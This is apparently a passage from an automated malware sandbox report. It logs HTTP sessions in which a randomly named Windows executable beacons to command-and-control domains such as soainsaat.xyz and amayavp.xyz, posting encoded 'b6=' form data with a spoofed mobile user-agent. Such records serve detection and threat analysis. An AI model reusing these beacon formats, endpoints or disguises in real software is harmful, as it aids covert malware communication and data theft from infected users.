                                                          8 | 192.168.2.6 | 49907 | 149.88.81.190 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:17.637489080 CET | 502 | OUT | GET /rq1s/?b6=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:28:19.293936014 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.6 | 49927 | 85.159.66.93 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:25.600266933 CET | 757 | OUT | POST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 6f 59 63 45 46 71 32 56 6f 6a 46 32 41 2b 6b 39 74 4f 64 72 77 7a 68 79 38 7a 6c 6e 75 49 53 7a 6b 71 7a 47 6d 36 33 7a 54 57 49
                                                          Data Ascii: b6=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRooYcEFq2VojF2A+k9tOdrwzhy8zlnuISzkqzGm63zTWI


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.6 | 49934 | 85.159.66.93 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:28.268274069 CET | 781 | OUT | POST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 54 6a 79 2b 72 58 6e 4f 49 34 78 6b 53 7a 55 78 32 51 38 6e 7a 72 77 79 6f 34 71 7a 5a 63 47 57 49 6a 43 75 56 45 75 4c 37 79 37 41 3d 3d
                                                          Data Ascii: b6=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gTjy+rXnOI4xkSzUx2Q8nzrwyo4qzZcGWIjCuVEuL7y7A==


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.6 | 49940 | 85.159.66.93 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:30.941718102 CET | 1794 | OUT | POST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 62 32 34 53 4f 71 78 64 75 70 75 42 50 6c 79 5a 48 54 67 5a 77 6b 35 6c 47 59 48 67 71 2f 39 32 66 6c 2f 48 4d 75 6f 44 4d 46 51 47 45 64 45 61 74 50 76 6f 4b 68 67 74 73 37 63 41 59 6b 52 2b 54 35 6a 45 46 54 44 6b 52 36 34 68 6a 51 71 4b 7a 37 4b 52 33 74 35 52 34 4f 46 36 2f 44 65 75 44 62 59 4f 38 45 32 45 4c 50 35 74 44 4a 51 69 67 4c 5a 74 69 4b 62 65 68 5a 52 79 75 39 49 4f 36 48 44 33 6c 34 6c 31 2b 32 54 37 78 71 50 58 74 45 76 45 41 64 79 4d 43 68 64 72 42 51 4d 68 41 42 48 41 67 [TRUNCATED]
                                                          Data Ascii: b6=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 [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.6 | 49947 | 85.159.66.93 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:33.605660915 CET | 505 | OUT | GET /rum2/?b6=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:28:35.058809996 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Tue, 03 Dec 2024 22:28:34 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 19
                                                          X-Rate-Limit-Reset: 2024-12-03T22:28:39.8232335Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.6 | 49965 | 185.27.134.144 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:40.744406939 CET | 751 | OUT | POST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 5a 4a 74 5a 33 7a 4b 2f 72 38 71 7a 4a 37 4f 78 46 42 52 4e 57 51 31 56 6c 31 39 50 6f 47 34 45 54 6f 33 4c 63 77 32 44 6a 31 51
                                                          Data Ascii: b6=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtZJtZ3zK/r8qzJ7OxFBRNWQ1Vl19PoG4ETo3Lcw2Dj1Q
                                                          Dec 3, 2024 23:28:42.023236036 CET | 686 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:41 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff 2f a7 a7 2b 8f 4e c2 0b 89 43 20 e9 cf cc 4f eb 6d 8a 55 44 06 ce 89 3a d1 a9 46 36 f8 66 c9 89 03 9e 50 ff 5a 61 76 b0 83 de e6 1a 3d fb 13 a4 1e 1c 73 6b 24 72 4a 02 53 9f f4 50 ab 56 c0 4f 2a 8e 67 d8 8c 94 5b 84 fd 05 46 75 33 ba 31 57 be 1e 4b 59 4e 30 72 16 9e 05 38 e5 e0 eb a7 b2 71 c8 44 5e 18 92 a8 43 9d 20 53 c6 85 03 87 25 6d 69 c2 09 39 41 dc 77 a7 21 12 cf 6e eb 91 03 5c 47 2c 7c fd 50 0b 09 c0 aa d1 b2 ae 5f 5c 68 a1 ec 2f fd 3d fd 8b c9 1c e0 66 3e 57 bb 2b 1b be 54 ec 53 07 18 d3 36 c4 55 bb 69 df 77 79 d5 f6 7d e2 7c f0 12 5e db af f6 cf 15 8e 71 89 31 f1 2f 2e 24 d0 c0 4b f8 b4 cb d1 90 c8 69 be 3d 05 00 fd 07 6e 73 c6 b4 92 36 96 2a 49 52 9b 4b 2e 0c cf 58 21 ad 66 32 d6 39 26 54 fb bc 2d 45 96 e7 26 75 ce 09 6e 32 29 73 21 63 26 53 26 98 ce 65 5b c4 02 32 53 9a 19 91 f2 42 9b 94 c9 29 42 b6 8b b8 c8 2d 2b 4c 6e 53 a7 4d 9a 48 5c d9 89 59 36 ba 03 d8 02 fc f7 b7 74 8b 25 60 1f 69 88 60 f7 df 3c 7c 86 d6 99 f9 6e ba f4 0c 4d a9 a2 9a 10 1f 57 28 33 [TRUNCATED]
                                                          Data Ascii: 1bc /+NC OmUD:F6fPZav=sk$rJSPVO*g[Fu31WKYN0r8qD^C S%mi9Aw!n\G,|P_\h/=f>W+TS6Uiwy}|^q1/.$Ki=ns6*IRK.X!f29&T-E&un2)s!c&S&e[2SB)B-+LnSMH\Y6t%`i`<|nMW(3?VwEQYdd=}*}N4Ut(9/khPD`dMh"WeJsFiF|#0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.6 | 49970 | 185.27.134.144 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:43.408987999 CET | 775 | OUT | POST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 77 33 56 6e 74 50 50 49 47 53 47 54 51 33 5a 4c 38 52 4d 58 51 7a 44 58 65 48 48 49 44 53 59 70 73 4e 38 54 55 55 49 4d 71 73 69 41 3d 3d
                                                          Data Ascii: b6=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfGw3VntPPIGSGTQ3ZL8RMXQzDXeHHIDSYpsN8TUUIMqsiA==
                                                          Dec 3, 2024 23:28:44.743237019 CET | 686 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:44 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff 2f a7 a7 2b 8f 4e c2 0b 89 43 20 e9 cf cc 4f eb 6d 8a 55 44 06 ce 89 3a d1 a9 46 36 f8 66 c9 89 03 9e 50 ff 5a 61 76 b0 83 de e6 1a 3d fb 13 a4 1e 1c 73 6b 24 72 4a 02 53 9f f4 50 ab 56 c0 4f 2a 8e 67 d8 8c 94 5b 84 fd 05 46 75 33 ba 31 57 be 1e 4b 59 4e 30 72 16 9e 05 38 e5 e0 eb a7 b2 71 c8 44 5e 18 92 a8 43 9d 20 53 c6 85 03 87 25 6d 69 c2 09 39 41 dc 77 a7 21 12 cf 6e eb 91 03 5c 47 2c 7c fd 50 0b 09 c0 aa d1 b2 ae 5f 5c 68 a1 ec 2f fd 3d fd 8b c9 1c e0 66 3e 57 bb 2b 1b be 54 ec 53 07 18 d3 36 c4 55 bb 69 df 77 79 d5 f6 7d e2 7c f0 12 5e db af f6 cf 15 8e 71 89 31 f1 2f 2e 24 d0 c0 4b f8 b4 cb d1 90 c8 69 be 3d 05 00 fd 07 6e 73 c6 b4 92 36 96 2a 49 52 9b 4b 2e 0c cf 58 21 ad 66 32 d6 39 26 54 fb bc 2d 45 96 e7 26 75 ce 09 6e 32 29 73 21 63 26 53 26 98 ce 65 5b c4 02 32 53 9a 19 91 f2 42 9b 94 c9 29 42 b6 8b b8 c8 2d 2b 4c 6e 53 a7 4d 9a 48 5c d9 89 59 36 ba 03 d8 02 fc f7 b7 74 8b 25 60 1f 69 88 60 f7 df 3c 7c 86 d6 99 f9 6e ba f4 0c 4d a9 a2 9a 10 1f 57 28 33 [TRUNCATED]
                                                          Data Ascii: 1bc /+NC OmUD:F6fPZav=sk$rJSPVO*g[Fu31WKYN0r8qD^C S%mi9Aw!n\G,|P_\h/=f>W+TS6Uiwy}|^q1/.$Ki=ns6*IRK.X!f29&T-E&un2)s!c&S&e[2SB)B-+LnSMH\Y6t%`i`<|nMW(3?VwEQYdd=}*}N4Ut(9/khPD`dMh"WeJsFiF|#0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.6 | 49977 | 185.27.134.144 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:46.080183983 CET | 1788 | OUT | POST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 42 4d 37 36 62 74 2b 6b 6f 71 4d 30 34 36 4a 67 5a 66 4c 4e 4b 64 4a 68 45 63 50 59 51 64 4d 6a 55 4c 64 78 69 2f 4f 62 4f 42 50 71 38 48 34 6d 6f 46 4d 64 76 47 2f 58 66 77 37 47 78 4f 4b 4f 6e 4c 34 34 54 66 79 7a 30 4f 32 46 75 46 39 46 49 33 6f 4f 62 4e 76 57 30 45 4d 68 74 49 2f 6b 30 59 76 55 2f 75 73 70 78 4b 66 38 7a 6b 75 33 78 5a 30 48 4c 37 63 47 4b 42 42 4f 43 67 50 67 45 52 4a 30 31 48 34 70 31 50 6f 68 72 35 44 50 69 63 30 35 57 6d 53 34 4d 6c 69 45 31 50 55 52 62 4e 77 4c 62 [TRUNCATED]
                                                          Data Ascii: b6=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 [TRUNCATED]
                                                          Dec 3, 2024 23:28:47.367964983 CET | 686 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:47 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff 2f a7 a7 2b 8f 4e c2 0b 89 43 20 e9 cf cc 4f eb 6d 8a 55 44 06 ce 89 3a d1 a9 46 36 f8 66 c9 89 03 9e 50 ff 5a 61 76 b0 83 de e6 1a 3d fb 13 a4 1e 1c 73 6b 24 72 4a 02 53 9f f4 50 ab 56 c0 4f 2a 8e 67 d8 8c 94 5b 84 fd 05 46 75 33 ba 31 57 be 1e 4b 59 4e 30 72 16 9e 05 38 e5 e0 eb a7 b2 71 c8 44 5e 18 92 a8 43 9d 20 53 c6 85 03 87 25 6d 69 c2 09 39 41 dc 77 a7 21 12 cf 6e eb 91 03 5c 47 2c 7c fd 50 0b 09 c0 aa d1 b2 ae 5f 5c 68 a1 ec 2f fd 3d fd 8b c9 1c e0 66 3e 57 bb 2b 1b be 54 ec 53 07 18 d3 36 c4 55 bb 69 df 77 79 d5 f6 7d e2 7c f0 12 5e db af f6 cf 15 8e 71 89 31 f1 2f 2e 24 d0 c0 4b f8 b4 cb d1 90 c8 69 be 3d 05 00 fd 07 6e 73 c6 b4 92 36 96 2a 49 52 9b 4b 2e 0c cf 58 21 ad 66 32 d6 39 26 54 fb bc 2d 45 96 e7 26 75 ce 09 6e 32 29 73 21 63 26 53 26 98 ce 65 5b c4 02 32 53 9a 19 91 f2 42 9b 94 c9 29 42 b6 8b b8 c8 2d 2b 4c 6e 53 a7 4d 9a 48 5c d9 89 59 36 ba 03 d8 02 fc f7 b7 74 8b 25 60 1f 69 88 60 f7 df 3c 7c 86 d6 99 f9 6e ba f4 0c 4d a9 a2 9a 10 1f 57 28 33 [TRUNCATED]
                                                          Data Ascii: 1bc /+NC OmUD:F6fPZav=sk$rJSPVO*g[Fu31WKYN0r8qD^C S%mi9Aw!n\G,|P_\h/=f>W+TS6Uiwy}|^q1/.$Ki=ns6*IRK.X!f29&T-E&un2)s!c&S&e[2SB)B-+LnSMH\Y6t%`i`<|nMW(3?VwEQYdd=}*}N4Ut(9/khPD`dMh"WeJsFiF|#0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.6 | 49983 | 185.27.134.144 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:48.866777897 CET | 503 | OUT | GET /d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:28:50.155714989 CET | 1194 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 993
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
